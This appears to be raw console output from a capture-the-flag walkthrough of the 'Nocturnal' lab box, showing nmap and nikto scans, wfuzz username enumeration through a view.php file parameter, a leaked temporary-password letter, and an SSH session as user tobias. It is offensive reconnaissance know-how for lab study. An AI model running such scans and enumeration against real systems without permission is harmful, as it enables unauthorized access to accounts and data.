$ sudo nmap -p- --min-rate=10000 10.10.11.64 Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:11 EDT Nmap scan report for 10.10.11.64 Host is up (0.18s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
$ sudo nmap -sT -sV -O -p22,80 10.10.11.64 Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:13 EDT Nmap scan report for nocturnal.htb (10.10.11.64) Host is up (0.17s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Linux 5.4 (94%), Linux 5.3 - 5.4 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (94%), HP P2000 G3 NAS device (93%), ASUS RT-N56U WAP (Linux 3.4) (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds
$ sudo nmap -sU -p22,80 10.10.11.64 Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT Nmap scan report for nocturnal.htb (10.10.11.64) Host is up (0.17s latency).
PORT STATE SERVICE 22/udp closed ssh 80/udp closed http
Nmap done: 1 IP address (1 host up) scanned in 0.53 seconds
$ sudo nmap --script=vuln -p22,80 10.10.11.64 Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 05:14 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for nocturnal.htb (10.10.11.64) Host is up (0.17s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-fileupload-exploiter: | | Couldn't find a file-type field. | |_ Couldn't find a file-type field. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /login.php: Possible admin folder |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set
Nmap done: 1 IP address (1 host up) scanned in 483.20 seconds
$ sudo nikto -h nocturnal.htb - ***** TLS/SSL support not available (see docs for SSL install) ***** - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.10.11.64 + Target Hostname: nocturnal.htb + Target Port: 80 + Start Time: 2025-04-24 05:24:24 (GMT-4) --------------------------------------------------------------------------- + Server: nginx/1.18.0 (Ubuntu) + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + No CGI Directories found (use '-C all' to force check all possible dirs) + nginx/1.18.0 appears to be outdated (current is at least 1.25.3). + /login.php: Admin login page/section found. + 7961 requests: 0 error(s) and 4 item(s) reported on remote host + End Time: 2025-04-24 05:50:44 (GMT-4) (1580 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
$ wfuzz --hh 2985 -w /Tools/fuzzDict/FuzzDicts/userNameDict/user.txt -b PHPSESSID=oqjc1kfqih7dkcej6al5h9o17p 'http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf' /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://nocturnal.htb/view.php?username=FUZZ&file=test1.pdf Total requests: 8886
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000001: 200 128 L 247 W 3037 Ch "admin" 000000016: 200 128 L 248 W 3105 Ch "test" 000000645: 200 128 L 248 W 3113 Ch "amanda" 000008252: 200 128 L 247 W 3037 Ch "tobias"
Dear Amanda, Nocturnal has set the following temporary password for you: ****************. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure. The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us. Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.
System information as of Thu 24 Apr 2025 01:15:06 PM UTC
System load: 0.03 Usage of /: 56.7% of 5.58GB Memory usage: 19% Swap usage: 0% Processes: 263 Users logged in: 1 IPv4 address for eth0: 10.10.11.64 IPv6 address for eth0: dead:beef::250:56ff:feb9:c065
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Apr 24 13:15:07 2025 from 10.10.14.40 tobias@nocturnal:~$ ll total 36 drwxr-x--x 5 tobias tobias 4096 Oct 19 2024 ./ drwxr-xr-x 3 root root 4096 Oct 17 2024 ../ lrwxrwxrwx 1 root root 9 Oct 18 2024 .bash_history -> /dev/null -rw-r--r-- 1 tobias tobias 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 tobias tobias 3771 Feb 25 2020 .bashrc drwx------ 2 tobias tobias 4096 Oct 18 2024 .cache/ drwxrwxr-x 3 tobias tobias 4096 Oct 18 2024 .local/ -rw-r--r-- 1 tobias tobias 807 Feb 25 2020 .profile lrwxrwxrwx 1 root root 9 Oct 18 2024 .sqlite_history -> /dev/null drwx------ 2 tobias tobias 4096 Apr 24 12:40 .ssh/ -rw-r----- 1 root tobias 33 Apr 24 09:03 user.txt